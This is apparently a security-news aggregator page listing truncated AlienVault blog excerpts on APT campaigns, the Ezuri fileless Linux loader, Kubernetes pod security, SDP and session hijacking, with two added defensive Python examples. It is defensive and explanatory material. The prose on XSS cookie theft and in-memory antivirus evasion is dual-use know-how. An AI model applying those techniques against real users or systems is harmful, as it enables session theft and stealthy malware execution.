What's new around the internet


Columns: Src | Date (GMT) | Title | Description | Tags | Stories | Notes
Source: AlienVault | Date (GMT): 2021-01-19 11:00:00 | Title: We are better together: AT&T USM Anywhere and Digital Defense Frontline (direct link)

An enterprise needs an evolving view of its environment. What does normal look like? What are the weak spots? What is the impact of the threat to your environment? Detecting the threat after collecting the right data is the first step. From there, the impact of the threat really matters; otherwise, security teams may be chasing after too many issues. Recently, we have taken a major step in this customer-driven journey by releasing our first Advanced AlienApp that tightly integrates asset, vulnerability and threat data. Our new Advanced AlienApp for Digital Defense includes Digital Defense Frontline Vulnerability Manager (Frontline VM™) and Frontline Advanced Threat Sweep (Frontline ATS™). Joining our suite of existing Advanced AlienApps, Frontline is the first AlienApp to offer additional asset discovery, correlation and de-duplication of dynamic assets, on-demand vulnerability scanning, passive malware detection, and security risk trend analysis and reporting. USM Anywhere with the AlienApp for Frontline also provides orchestration actions to help streamline incident response activities and to get even deeper visibility into the assets on the network and their respective vulnerabilities.

Digital Defense Frontline

The Frontline platform is a multi-tenant, cloud-native SaaS platform that supports both agent and agent-less scanning of assets through advanced fingerprinting, which leads to a lightweight customized scan that is often used for on-demand and real-time scanning of assets with minimal performance impact. More importantly, Frontline’s highly customized scanning means a false positive rate

Tags: Malware, Vulnerability, Threat, Patching, Guideline
Source: AlienVault | Date (GMT): 2021-01-18 11:00:00 | Title: 5 New cybersecurity threats and challenges facing the financial services sector (direct link)

This blog was written by an independent guest blogger. It’s been a mixed year for the financial services sector. Some companies have seen increased demand for their services, while others have struggled to deal with the downturn in mortgage deals and reduced consumer spending. At a more granular level, many financial services companies have also had to deal with new ways of working, including putting in place virtual CISOs and scrambling to protect remote workers from increased levels of cyber threats. It’s worth recognizing, however, that very few of the threats that remote employees face are completely new. In fact, most of the challenges facing the sector, and particularly the increased complexity of supply chains and consumer networks, have been around for at least a decade. Still, as 2020 draws to a close, it’s a good moment to cast an eye over the threat landscape that financial services companies find themselves in, and to highlight the key challenges on the road ahead. In this article, we’ll do just that.

1. Misinformation and trust

This year saw several newspapers in the US, including The New York Times, launch new initiatives to track viral misinformation. While most of this misinformation was focused on ostensibly political opponents, it also appears to have had an effect on confidence in financial services. Not only is this a business challenge for established financial services companies, it also creates real cybersecurity challenges for them. One of these is...

2. Complex supply chains

Perhaps the biggest of these challenges is the fact that the increasing complexity of the financial services sector offers a larger attack surface for hackers and malware. Customers are increasingly keen to manage their finances via an interconnected network of traditional banking tools and novel accountancy apps. Any personal accounting software consumers use to track their finances should come PCI DSS compliant to ensure that their financial data is stored encrypted in a secured environment, and thus reduce the odds of them falling victim to a cyberattack. This approach might provide added convenience and security for businesses and consumers alike, but it’s also not enough. To be more specific, financial services organizations will need to focus on protecting remote endpoints in order to deal with the increased number of potentially exposed endpoints. This includes developing inventories of assets and software, running patch detection and vulnerability scans to locate issues, and then an automated remediation validation phase to ensure that any patches or configuration changes used to fix the vulnerability were effective.

3. Credential and identity theft

Though the financial services sector has had to deal with the consequences of identity theft for years now, 2020 was the year that identity and credential theft exploded. Early analyses show that during the pandemic, the rate of identity theft increased significantly. This increase has come despite increased consumer awareness of the risks of identity theft, and shows that awareness of these dangers is not enough. Consumers know that they should be careful to protect their data, but also lack the expert knowledge necessary to protect every aspect of their online lives. For the financial services sector, this

Tags: Ransomware, Vulnerability, Threat
Source: AlienVault | Date (GMT): 2021-01-14 11:00:00 | Title: Security context: The starting point for how Kubernetes Pod security works (direct link)

This blog was written by an independent guest blogger. Organizations are increasingly adopting Kubernetes to manage their containerized workloads and services, but Kubernetes security incidents are on the rise as well. In the fall 2020 edition of the “State of Container and Kubernetes Security” report, for instance, 91% of respondents told StackRox that they had recently adopted Kubernetes. Three quarters of survey participants went on to reveal that they had deployed the container orchestration platform in their production environments. Even so, nine out of 10 respondents told the company that their organizations had suffered a security incident in their container and Kubernetes environments over the last 12 months. Subsequently, nearly half (44%) of respondents said that they had delayed moving an application into production due to their security concerns. These findings highlight the need for organizations to strengthen their Kubernetes security. They can do this by focusing on the security of their pods. StackRox explains why in a blog post:

Securing pods, and the containers that run as part of them, is a critical aspect of protecting your Kubernetes environments. Among other reasons, pods and containers are the individual units of compute that are ultimately subject to adversarial techniques that may be used as part of any attack on your Kubernetes clusters. Since pods are also the smallest resource you can deploy and manage in Kubernetes, applying security at this level ensures greater fine-grained controls that are scoped to individual application components.

Organizations can specifically use Pod Security Policies (PSPs) to strengthen their pod security. Before that even happens, they need to figure out what they want to define within those PSPs. That’s where security context comes into play.

What are security contexts?

According to Kubernetes’ documentation, security contexts define the privileges and access control settings for a selected pod or container. These settings include Linux Capabilities, through which users can give a process some privileges but not those of a root user. They also include AllowPrivilegeEscalation, a control through which users decide whether a process can become more privileged than its parent process. Additional examples of security contexts are available here. To set up security contexts, users need to have a Kubernetes cluster and the kubectl command-line tool configured to communicate with that cluster. They can then include the “securityContext” field in the specification for their pod or container. This action applies whatever security settings they want to their selected resource.

Moving on with Pod Security Policies

Once they know the security context, organizations can create a Pod Security Policy. Kubernetes notes elsewhere on its website that a PSP functions as a cluster-level resource that defines the security conditions under which a pod is allowed to run. Such a policy encapsulates and enforces one or more security contexts chosen by the user.

Stories: Uber
Source: AlienVault | Date (GMT): 2021-01-13 11:00:00 | Title: A Global Perspective of the SideWinder APT (direct link)

AT&T Alien Labs has conducted an investigation on the adversary group publicly known as SideWinder in order to historically document its highly active campaigns and identify a more complete picture of targets, motivations, and objectives. Through our investigation, we have uncovered a collection of activity targeting government and business throughout South Asia and East Asia spanning many years. Our findings are primarily focused on activity since 2017; however, the group has reportedly been operating since at least 2012. Alien Labs, along with other security researchers, has assessed with low to medium confidence that the group operates in support of Indian political interests, based on targets, campaign timelines, technical characteristics of command and control (C2) infrastructure and malware, association with other known India-interest APTs, past cyber threat intelligence reporting, and our private telemetry. SideWinder is a highly active adversary primarily making use of email spear phishing, document exploitation, and DLL side-loading techniques to evade detection and to deliver targeted implants. The adversary activity remains at a consistent rate, and AT&T Alien Labs recommends the deployment of detections and retrospective analysis of shared indicators of compromise (IOCs) for past undetected activity. In this report we are providing a timeline of known campaigns and their associated IOCs, in addition to a large number of campaigns/IOCs which have not been previously reported or publicly identified. Full reports and IOCs are available here.

Tags: Threat
Stories: APT-C-17
Source: AlienVault | Date (GMT): 2021-01-13 06:01:00 | Title: What is a vulnerability management program and should your business have one? (direct link)

This blog was written by a third party author. The rapid rate of change in attack methods and techniques in today’s cybersecurity landscape has made keeping an environment secure increasingly difficult, causing many to fall into a dangerous state of simply reacting to current threats. Organizations that are serious about the state of their cybersecurity readiness are seeking to proactively look for those vulnerable applications, operating systems, and platforms within the network environment that cybercriminals would otherwise exploit to gain access, elevate privilege, move laterally, establish persistence, and carry out actions to a malicious end. One tenet of a comprehensive proactive security strategy is that of vulnerability management. Vulnerability management is commonly defined as “the practice of identifying, classifying, remediating and mitigating vulnerabilities.” Unlike patching based on security thresholds such as the Common Vulnerability Scoring System (CVSS), vulnerability management is a continual process that seeks to intelligently prioritize the response to daily identified vulnerabilities before an attacker attempts to exploit them, keeping the organization as secure as possible.

What is a Vulnerability Management Program?

A Vulnerability Management Program is a risk-based, established continuous process within the organization designed to address the need to identify and remediate vulnerabilities. It leverages a team of members spanning multiple departments including security, IT, AppSec, and DevOps; tools such as asset management, vulnerability scanning, and vulnerability assessment solutions; as well as a means to update the potentially wide range of disparate operating systems, applications, appliances, and devices involved.

The pillars of vulnerability management

A Vulnerability Management Program generally consists of just four basic pillars:

- Discovery: Having an understanding of every potential source of vulnerability, including laptops, desktops, servers, firewalls, networking devices, printers, and more, serves as the foundation for any solid Vulnerability Management Program.
- Identification: Using a vulnerability scanning solution, those systems and devices under management are scanned, looking for known vulnerabilities and correlating scan findings with said vulnerabilities.
- Reporting / prioritization: This step is a bit more complex than I’m going to cover here. Keeping in mind that you may have thousands of potential vulnerabilities (depending on the size and complexity of your environment), there will no doubt be varying factors that will determine which discovered vulnerabilities take priority over others. But in this step, those on the Vulnerability Management Program team will need to assess the identified vulnerabilities and determine priority.
- Response / remediation: It should be noted first that the remediation step isn’t always “patch it.” In some cases, there isn’t a patch, and so the remediation actions utilize some kind of compensating control. Part of the process of remediating involves re-testing, whether via another vulnerability scan or a penetration test.

A framework for building a program in-house

Providing you have ample staffing and internal expertise, it is possible to implement a Vulnerability Management Program in-house. As previously implied, it will take a team of folks who are responsible for the various parts of the organization that are impacted by both vulnerability scans and the resultant patching and/or remediation. Building a framework is also going to take some dedicated time to build, test, and adjust to meet your organization’s specific needs. A myriad of software solutions will be needed (whose list will be influenced by your industry/vertical’s individ

Tags: Vulnerability, Patching
Source: AlienVault | Date (GMT): 2021-01-12 11:00:00 | Title: Why cybersecurity awareness is a team sport (direct link)

This blog was written by an independent guest blogger. Cybersecurity may be different based on a person's viewpoint. One may want to simply protect and secure their social media accounts from hackers, and that would be the definition of what cybersecurity is to them. On the other hand, a small business owner may want to protect and secure credit card information gathered from their point-of-sale registers, and that is what they define as cybersecurity. Despite differences in implementation, at its core, cybersecurity pertains to the mitigation of potential intrusion of unauthorized persons into your system(s). It should encompass all aspects of one’s digital experience, whether you are an individual user or a company. Your cyber protection needs to cover your online platforms, devices, servers, and even your cloud storage. Any unprotected area of your digital journey can serve as an exploit point for hackers and cyber criminals intent on finding vulnerabilities. People assume that it is the responsibility of the IT Department to stop any intrusion. That may be true up to a certain point, but in reality cybersecurity responsibility rests with everyone. Cybersecurity should be everybody’s business. The cybersecurity landscape is changing. With 68% of businesses saying that their cybersecurity risks have increased, it is no wonder that businesses have been making increased efforts to protect from, and mitigate, attacks. During the height of the pandemic, about 46% of the workforce shifted to working from home. We saw a surge in cybersecurity attacks; for example, RDP brute-force attacks increased by 400% around the same time. This is why cybersecurity must be and should be everybody’s business.

According to the 2019 Cost of Cybercrime Study, cyberattacks often are successful due to employees willingly participating as internal actors, or employees and affiliates carelessly clicking a link by accident. Sadly, it is still happening today. Unsuspecting employees can be caught vulnerable and cause a corporate-wide cyberattack by opening a phishing email or bringing risks into the company’s network in a BYOD (Bring Your Own Device) system. Just a decade ago, Yahoo experienced a series of major data breaches, via a backdoor to their network system established by a hacker (or a group of hackers). Further digital forensic investigation shows the breach started from a phishing email opened by an employee. Another example was Equifax, which experienced a data breach in 2017 and was liable for fines amounting to $425 million by the Federal Trade Commission (FTC). Companies continue to double up on their investments in cybersecurity and privacy protection today to ensure that incidents like these do not happen to their own networks. But a network is only as strong as its weakest link. Hackers continue to innovate, making their attacks more and mo

Tags: Ransomware, Data Breach, Malware, Vulnerability, Guideline
Stories: Equifax, Yahoo
Source: AlienVault | Date (GMT): 2021-01-11 11:00:00 | Title: Why are cybercriminals suddenly targeting maritime infrastructure? (direct link)

This blog was written by an independent guest blogger. If you were asked to list out the top problems society has been facing in 2020, cyberattacks on the maritime industry might not be an obvious issue that would come to mind. But the industry has seen a worrying trend in recent months, with a spike in cyberattacks that has left some of the biggest companies in the industry exposed. Specifically, both the fourth largest global shipping company and the International Maritime Organization (IMO) have been targeted in these attacks. And while shipping companies might seem like an obscure target for hackers, in reality these attacks can tell us a lot about emerging trends in cybersecurity in general. In this article, we’ll take a deeper look at these recent attacks, and what they can tell us about new threats we are likely to face in the years to come.

A new type of cyberattack

At first glance, the fact that maritime cyber attacks have increased by 900% in three years might seem strange. Shipping companies have, after all, been around for centuries. Why the sudden spike? There are a number of factors at play, some technical and some political. First, the political. Back in May, with the pandemic raging and the first lockdown orders being put in place, you may have missed a very important piece of news. That month, Israel and Iran traded cyberattacks in a way that caught the attention of many analysts. This was because these attacks were unusually open, and seemed to indicate an increased willingness for states to attack not just their opponents’ military systems, but to attempt to cause economic disruption as well. Specifically, on May 9th of this year hackers went after the Shahid Rajaee Port’s computer systems near the Strait of Hormuz, which is the busiest harbor in Iran for maritime trade. In this new world, it seems that ports, ships, and shipping companies have become a favorite target of cybercriminals. Some of these criminals are state-sponsored, with a corresponding level of technical support and resources.

Vulnerabilities

Looked at another way, the increase in attacks against maritime companies can
Source: AlienVault | Date (GMT): 2021-01-07 11:00:00 | Title: Malware using new Ezuri memory loader (direct link)

This blog was written by Ofer Caspi and Fernando Martinez of AT&T Alien Labs. Multiple threat actors have recently started using a Go language (Golang) tool to act as a packer and avoid antivirus detection. Additionally, the Ezuri memory loader tool acts as a malware loader and executes its payload in memory, without writing the file to disk. While this technique is known and commonly used by Windows malware, it is less popular in Linux environments. The loader decrypts the malicious payload and executes it using memfd_create (as described in this blog in 2018). When creating a process, the system returns a file descriptor to an anonymous file that is visible only under '/proc/PID/fd/' in the filesystem. Figure 1 shows a code snippet from the loader, containing the information it uses in order to decrypt the payload using the AES algorithm.

Figure 1. Loader code snippet via Alien Labs analysis.

The loader, written in Golang, is taken from the "Ezuri" code on GitHub via the user guitmz. This user originally created the ELF loader around March 2019, when he wrote a blog about the technique to run ELF executables from memory and shared the loader on his GitHub. Additionally, a similar user ‘TMZ’ (presumably associated with the previously mentioned ‘guitmz’) posted this same code in late August, on a small forum where malware samples are shared. The guitmz user even ran tests against VirusTotal to prove the efficiency of the code, uploading a detected Linux.Cephei sample (35308b8b770d2d4f78299262f595a0769e55152cb432d0efc42292db01609a18) with 30/61 AV detections in VirusTotal, compared to the zero AV detections of the same sample hidden with the Ezuri code (ddbb714157f2ef91c1ec350cdf1d1f545290967f61491404c81b4e6e52f5c41f).

Tags: Malware, Tool, Threat
Source: AlienVault | Date (GMT): 2021-01-07 06:01:00 | Title: What is URL filtering? Web filtering explained (direct link)

This blog was written by a third party author.

What is URL filtering?

URL filtering is one of the most common types of web filtering techniques used by organizations to restrict the kinds of content that their users may access. URL filtering blocks users from loading questionable websites or hosted files via corporate devices or network resources. The filter is triggered by comparing the URL address a user is trying to access against policy lists that specify whether to block, allow, and/or track visits to certain URL addresses. The URL filtering process occurs at the application layer by examining URL requests over common protocols like HTTP/HTTPS, FTP, and SMTP. Malicious, time-wasting, or otherwise questionable URL addresses can be filtered on a page-by-page basis as well as on a category basis to broadly block access to certain kinds of content such as gambling, social media, or known phishing sites. The known malicious URLs and category definitions in a URL filtering database are primarily maintained by the security vendor supplying the enforcement product. URL classification is typically performed by the vendor through a combination of internal research, threat intelligence, machine learning, and artificial intelligence algorithms. In addition, the URL filtering database and enforcement policy lists are often highly customizable by the customer. That customization can be done across an organization or be tailored to departments, user groups, or even specific users. Similarly, filtering policies could be applied according to time of day or user location. This makes it possible, for instance, to block cloud storage sites for employees except for the sales team, who might need them to share information with prospects. Or it could be used to enable remote access by a financial analyst to certain cloud-based accounting software during business hours, but to limit that access after close of business.

Web filtering use cases and benefits

Web filtering techniques like URL filtering are best known for their cybersecurity use cases; however, they provide additional benefits in a number of other business scenarios. The following are 4 of the most common uses of URL filtering and other content filtering methods:

- Blocking malicious activity: URL filtering is most commonly used to block malicious websites and hosted files associated with known phishing campaigns, malware propagation, and other cybercriminal activity.
- Enforcing NSFW corporate policy: Organizations can utilize URL filters to restrict access to not-safe-for-work content that runs afoul of corporate policies, such as pornography or gambling sites—many of which are also conduits for cybersecurity threats.
- Promoting employee efficiency: Many businesses take advantage of the additional benefits of URL filtering by utilizing the capabilities to limit employee access to distracting content in categories like shopping, news, and social media sites.
- Minimizing bandwidth strain: In addition to reducing distraction from non-work related content, URL filtering can also minimize the use of bandwidth-hogging applications such as video streaming and online gaming sites.

URL filtering vs DNS filtering

URL filtering is a more granular form of web filtering than DNS filtering, which blocks or allows content across entire web domains based on DNS queries. DNS filtering takes more of a blunt hammer approach to blocking sites. It is most appropriate for filtering out whole domains associated with highly malicious activity that have little chance of hosting legitimate content. Meanwhile, URL filtering takes more of a scalpel approach, allowing organizations to block certain specific web pages or hosted files from a given domain while allowing users unimpeded access to other legitimate pages hosted on

Tags: Malware, Threat
Source: AlienVault | Date (GMT): 2021-01-06 11:00:00 | Title: IoT Cybersecurity Act successfully signed into law (direct link)

This blog was written by an independent guest blogger. The IoT Cybersecurity Act, which aims to reduce the supply chain risk to the federal government arising from vulnerable IoT devices, was recently passed into law, and its effects are expected to carry over into private enterprise. Critics felt the law was long overdue: as found in the Nokia Threat Intelligence Report 2020, IoT devices are now responsible for 32.72% of all infections observed in mobile networks, representing an increase of 16.55% since 2019 alone. What threats can the rapid proliferation of IoT devices cause, and how is the new law dealing with them?

2020: A year of unprecedented cyber attacks

2020 has demonstrated the extent to which cyber criminals can quickly take advantage of major changes and crises taking place in the world. In a recent report, Fortinet warns that the introduction of edge devices will provide attackers with even more opportunity to wreak havoc via advanced threats. Over the past few years, traditional networks have been replaced with multiple-edge environments, IoT, WAN, remote center, and more. Fortinet adds that “while all of these edges are interconnected many organizations have sacrificed centralized visibility and unified control in favor of performance and digital transformation.” Cyber criminals will be harnessing the speed and scale that 5G will enable to target these environments at a more profound level.

Main threats to security posed by connectivity

Some of the biggest threats to cyber security include trojans seeking to target the edge, edge-enabled swarm attacks, smarter social engineering, and the possibility of ransoming OT edges. In the case of everyday users, the practical implications are endless. For instance, in the case of social engineering, attackers can use important contextual information about users’ daily routines and financial information to ransom, extort, and ca

Tags: Ransomware, Threat, Patching
Source: AlienVault | Date (GMT): 2021-01-05 11:00:00 | Title: Calm in the COVID storm: AT&T Cybersecurity (direct link)

We’ve been busy at AT&T Cybersecurity during the pandemic. Turns out we could help out our network customers in so many ways. Here are some examples:

Helping enable remote learning

Many schools closed their doors in spring 2020, when COVID-19 cases began to spike within the U.S., and quickly transitioned to a distance learning model. While this move was necessary to protect the health of students and faculty, it left many low-income families in a position to figure out how they could connect their children to their school’s virtual classrooms when they had no internet service at home. AT&T worked with the popular sports team the San Antonio Spurs to offer free and highly secure wireless internet to families from the AT&T Center parking lot. The Spurs managed the physical solution via wireless access points provided by Aruba Networks, while AT&T provided the 1GbE internet circuit at no cost. And while access is critical to remote learning, it’s also important that students’ ability to participate in class isn’t hampered by issues that could cripple their device, such as malware. So, to protect students from threats that they may encounter online, AT&T Cybersecurity’s Global Security Gateway service was also deployed free of charge.

Preserving business continuity

Organizations are relying more than ever on their network connections to support their remote workers and to process e-commerce transactions. Bad actors have identified this dependence as a prime opportunity to strike and make some quick cash. Over the past couple of months, there have been global DDoS extortion campaigns that began by targeting businesses within the financial services sector but have since expanded to include many other industries. Victims of this campaign have received letters demanding payment of 20 Bitcoin on average (approximately US $227,000) to avoid large-volume DDoS attacks. The AT&T Cybersecurity Threat Operations Center has been monitoring network traffic 24x7 for customers that subscribe to the AT&T DDoS Defense service to identify and mitigate attacks, and has also been assisting many non-subscribing customers with emergency mitigation services. In these instances, AT&T redirected the network traffic of affected organizations to its scrubbing centers to block the malicious traffic while letting legitimate transactions flow unimpeded, allowing business to resume without paying these inflated ransom demands.

Detecting threats before they impact your business

One thing that hasn’t slowed down during this pandemic is cybercrime. Cybercriminals are taking advantage of the fear and uncertainty surrounding the current global health and economic situation, as well as sudden shifts and exposures in IT environments, to launch attack campaigns. The FBI recently reported that cyberattacks are up to around 4,000 incidents per day. With this increase in attacks, organizations need visibility and continuous monitoring of their entire environment to help detect and respond to threats before their business is impacted. The AT&T Managed Threat Detection and Response analyst team has been monitoring customer environments 24x7 for signs of potential threats and documenting investigations. For examples, check out the blog series: Stories from the SOC. The team has been able

Tags: Malware, Threat, Guideline
AlienVault.webp 2021-01-05 06:01:00 What is a software-defined perimeter and how does SDP work? (lien direct) This blog was written by a third party author. What is a software-defined perimeter? A software defined perimeter (SDP) establishes virtual boundaries around Internet-connected assets and user activity through an integrated security architecture approach. SDP works regardless of whether assets reside on-premises or in the cloud, or whether users are on-site or working remote. Rather than relying on hardware like firewalls or VPNs at the network boundary, SDP leverages software to prevent any access to or even visibility into resources within the virtual perimeter by default. This deny-all approach only grants access through robust, mutual authentication of authorized users and validated devices attempting connection. Internet-connected resources protected by the SDP architecture remain otherwise hidden to everyone (and everything) else. Organizations have historically used firewalls not only at the boundary of the network but also to segment off a limited number of sensitive areas for higher levels of protection. But those segments are typically very broad. SDP makes it possible to take the principle of least privilege to its logical conclusion through much more tightly defined micro segmentation of resources. SDP gates access on a 1-to-1 connection basis rather than an IP basis to account for the broad distribution of assets in cloud environments. This means that SDP access is granted to specific resources rather than a network at large. While it might still be wise to use firewalls for internal segmentation to limit the reach of malware, SDP technology supplants many of its traditional protection benefits. What security technologies are considered SDP? 
While there are standalone SDP platforms on the market, SDP is more of an architectural model than a single security product, as it wraps in technology like multi-factor authentication, encryption, network gateways and more. As the Cloud Security Alliance recently explained in its Software-Defined Perimeter Architecture Guide, SDP architectures are designed to build in five layers of security at a minimum: Authentication and validation of devices Authentication and authorization of users Two-way encrypted communications Dynamic provisioning of connections Control over connections to services while keeping them hidden The hallmark of the SDP architecture is that it separates the access control plane from the data plane, typically through user-aware applications, client-aware devices, and network-aware firewalls and gateways. The nerve center of the SDP technical stack is the software-based SDP controller, which supports authorization and authentication services, encryption technology, context-aware technology like geolocation, centralizes policies, and handles communication with SDP clients and gateways. Connection attempts are not made directly from an initiating host (typically the client) to the controller, but are instead routed through an accepting host (typically the gateway), which interfaces with the controller to determine whether the accepting host may establish a two-way encrypted connection with the initiating host. Both the controller and the accepting host are protected by single-packet authorization (SPA): they drop every packet that is not a single, cryptographically authenticated authorization packet from a known client, so a port scan sees no listening service, which is what keeps them hidden from unauthorized users and devices. Comparing SDP to traditional VPN One of the big advantages of SDP is that it offers the same user experience for those accessing resources remotely as it does for users within the confines of the office. And usually, it does so more securely than a VPN in the process. 
VPNs are designed to provide an encrypted communication tunnel through traditionally firewalled network boundaries to access on-premises resources. But they're a notorious performance chokepoint for remote users, especially when tapping into
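The single-packet authorization step described in the SDP entry above, as an added example that is not part of the original blog or of any SDP product: the initiating host sends one HMAC-authenticated datagram carrying its identity, the service it wants, a timestamp and a nonce; the accepting host verifies the tag, freshness and replay state before it will "open" anything. The packet layout, the 30-second window, the pre-shared key table and the service names are assumptions for this example (real SDP gateways such as fwknop-style implementations encrypt the packet as well; the verification order is the point here).

```python
# Added example (not from the blog): minimal single-packet authorization (SPA).
# Packet format, freshness window and key provisioning are assumptions.
import hashlib
import hmac
import json
import os
import time

WINDOW_SECONDS = 30   # assumed: how old a packet's timestamp may be
TAG_LEN = 32          # HMAC-SHA256 output length


def build_spa_packet(key, client_id, service, now=None):
    """Initiating host: one self-contained datagram; there is no prior handshake."""
    body = {
        "client_id": client_id,
        "service": service,
        "ts": int(time.time() if now is None else now),
        "nonce": os.urandom(16).hex(),
    }
    payload = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return payload + b"." + tag


class SpaGateway:
    """Accepting host: silently drops everything except a fresh, authentic packet."""

    def __init__(self, keys, allowed):
        self.keys = keys            # client_id -> shared key (assumed pre-provisioned)
        self.allowed = allowed      # client_id -> set of services it may reach
        self.seen_nonces = set()    # replay cache; a real gateway expires old entries

    def verify(self, packet, now=None):
        now = time.time() if now is None else now
        if len(packet) < TAG_LEN + 2 or packet[-TAG_LEN - 1:-TAG_LEN] != b".":
            return False, "malformed"
        payload, tag = packet[:-TAG_LEN - 1], packet[-TAG_LEN:]
        try:
            body = json.loads(payload)
        except ValueError:
            return False, "malformed"
        if not isinstance(body, dict) or not isinstance(body.get("client_id"), str):
            return False, "malformed"
        key = self.keys.get(body["client_id"])
        if key is None:
            return False, "unknown client"
        # Verify the tag before trusting any other field; compare_digest avoids timing leaks.
        expected = hmac.new(key, payload, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return False, "bad tag"
        ts, nonce, service = body.get("ts"), body.get("nonce"), body.get("service")
        if not isinstance(ts, int) or abs(now - ts) > WINDOW_SECONDS:
            return False, "stale"
        if nonce in self.seen_nonces:
            return False, "replay"
        self.seen_nonces.add(nonce)
        if service not in self.allowed.get(body["client_id"], set()):
            return False, "not authorized for service"
        return True, "open"      # only now would the gateway add a firewall rule for the source


if __name__ == "__main__":
    shared = os.urandom(32)
    gateway = SpaGateway({"alice": shared}, {"alice": {"ssh"}})
    print(gateway.verify(build_spa_packet(shared, "alice", "ssh")))     # (True, 'open')
    print(gateway.verify(build_spa_packet(shared, "alice", "rdp")))     # not authorized
```

Note the ordering: an unauthenticated packet is rejected on the tag alone, so a scanner never learns which client IDs or services exist, and the nonce cache means a captured packet cannot be replayed inside the freshness window.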
AlienVault.webp 2020-12-22 11:00:00 \'Tis the season for session hijacking - Here\'s how to stop it (lien direct) This blog was written by an independent guest blogger. The air is getting colder, leaves are falling from the trees, and people everywhere are settling in for the holiday season. Which means one thing - increased cybersecurity vulnerability. With more aspects of the winter holidays relegated to online platforms this year, people everywhere are more susceptible to cyberattacks. Luckily, there are plenty of simple steps you can take to protect yourself from digital threats and online scams. But there is one particularly nefarious type of cyberattack that you might not be aware of. This is session hijacking. In this article, we will take a look at what session hijacking is, how the holidays make you extra vulnerable to this type of attack, and how to prevent it from happening to you. What is Session Hijacking? Let’s start with the terms. A session is the period of time when a user is actively accessing an application, website, or other online service. Each user session begins when you log into a website or app and ends when you log out of it. For example, when you type your username and password into a banking application, that begins your session on that online application. When you log into an online application, the server typically sets a temporary session cookie in your browser. This cookie tells the server, on every later request, that this browser has already been authenticated. Each session cookie carries a unique session ID, or key. If an attacker is able to obtain your session ID, they can act as you in that session. Session hijacking, also called “cookie hijacking”, can follow several patterns. One method, cross-site scripting, or XSS, essentially works like this. An attacker gets a script of their own into a page served by the site the victim is using, for example through an input the site fails to sanitize. 
The victim logs in to the site and receives a session cookie. The server returns the page code with the attacker’s script embedded, the victim’s own browser executes it, and if the cookie is readable from script (that is, it was set without the HttpOnly attribute) the script sends the victim’s session cookie to the attacker. The attacker is then granted access to the user’s session, meaning they can witness any interaction taking place there and steal any sensitive information revealed in the session. Malvertising is another current “hot” technique that induces a victim to click on an ad carrying malicious code that snags the session ID, again handing the attacker the victim’s unique session key. Here too, the victim is already authenticated on the server, so the attacker can hijack the session. All the attacker has to do is present the victim’s session ID from their own browser, and the server treats the attacker’s connection as the victim’s already authenticated session. Holidays under threat The coronavirus pandemic has had many wide-ranging effects on all of us. One result of this global situation is the massive increase in cybersecurity vulnerability. Studies have shown precipitous rises in spam attempts, as opportunistic hackers seek to prey on widespread uncertainty. But the pandemic places cybersecurity at risk on another level as well. This year, the holidays have gone digital to an extent never seen bef Spam Studies
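What an injected script can and cannot steal depends on how the session cookie was set. The following is an added example, not code from the guest post: it parses Set-Cookie headers, reports the attributes whose absence makes a session hijackable (HttpOnly, Secure, SameSite), simulates what document.cookie would expose to an XSS or malvertising payload, and shows the server-side habit of issuing a fresh session ID at login. The two header strings, the cookie name "sid" and the in-memory session table are constructed for the example.

```python
# Added example (not from the blog): session-cookie audit and the document.cookie view.
# Sample headers and the session table are constructed for the example.
import secrets

SAMPLE_SET_COOKIE_HEADERS = [  # constructed responses from two hypothetical sites
    "sid=1a2b3c; Path=/",                                   # weak: readable by page script
    "sid=9f8e7d; Path=/; HttpOnly; Secure; SameSite=Lax",   # hardened
]


def parse_set_cookie(header):
    """Return (name, value, {attribute_lowercase: value_or_None}) for one Set-Cookie header."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        k, _, v = attr.partition("=")
        attrs[k.strip().lower()] = v.strip() or None
    return name.strip(), value, attrs


def audit_set_cookie(header):
    """List the weaknesses that make a session cookie hijackable."""
    _, _, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie by injected script")
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plaintext HTTP and sniffable on shared networks")
    if (attrs.get("samesite") or "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests")
    return findings


def script_visible_cookies(headers):
    """Simulate document.cookie: only cookies set without HttpOnly are exposed to page script."""
    visible = {}
    for h in headers:
        name, value, attrs = parse_set_cookie(h)
        if "httponly" not in attrs:
            visible[name] = value
    return visible


def new_session_id():
    """Server side: an unguessable session ID (256 bits from the OS CSPRNG)."""
    return secrets.token_urlsafe(32)


def rotate_on_login(sessions, old_sid, user):
    """Issue a fresh ID at authentication so an ID known before login never becomes an authenticated one."""
    sessions.pop(old_sid, None)
    sid = new_session_id()
    sessions[sid] = {"user": user}
    return sid


if __name__ == "__main__":
    for h in SAMPLE_SET_COOKIE_HEADERS:
        print(h, "->", audit_set_cookie(h) or "ok")
    print("document.cookie would expose:", script_visible_cookies(SAMPLE_SET_COOKIE_HEADERS))
```

The audit is the check to run against any login response: the first header fails on all three counts, so the XSS scenario in the post works against it, while the hardened header hides the ID from script entirely. HttpOnly does not stop an attacker who can make requests from the victim's browser, so it complements, rather than replaces, fixing the XSS itself.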
AlienVault.webp 2020-12-18 11:00:00 \'Twas the night before InfoSec (lien direct) This blog was written by an independent guest blogger. ‘Twas the night before Christmas, and fresh off the LAN The packets were coming fast out of the span. My wireshark was up with my templates in place, In hopes that I’d find an IP I could trace. The smart home was snug in its /28 With a meager allow-list, and a lock on the gate. With a few hours to setup and wrap this year’s catches I’d been charging them up, and applying their patches, When down in the VLAN there’d been such a spike I’d opened the logs to see what it looked like. Away to the dashboard I stumbled and flew; Most days I’m on Red, but tonight, I was Blue. The DST in the headers was a weird bogon range. “Two oh three... zero? You can’t route there... how strange.” When what, to my wondering eyes, should come back But a TCP handshake -- not a RST, but an ACK! A cool sweaty IR-like calm to me came, As the nightmares and malwares, I ruled out by name: “The SPIDERs and PANDAs don’t care about me, It’s not running Windows, so it’s not IcedID… Not Trickbot, not Ryuk, not Buer or Clop, Not Scarab or Locky, no second-stage drop.” A session had opened on port 443, And a download began - not one started by me. I looked back to ensure that the capture was on, And stood by to cut comms once the vandal was gone. But the session closed up just as fast as it came And the download just sat there - “GIFT.BIN” was its name. I’d retrieved a live sample! And without any warning, Had got 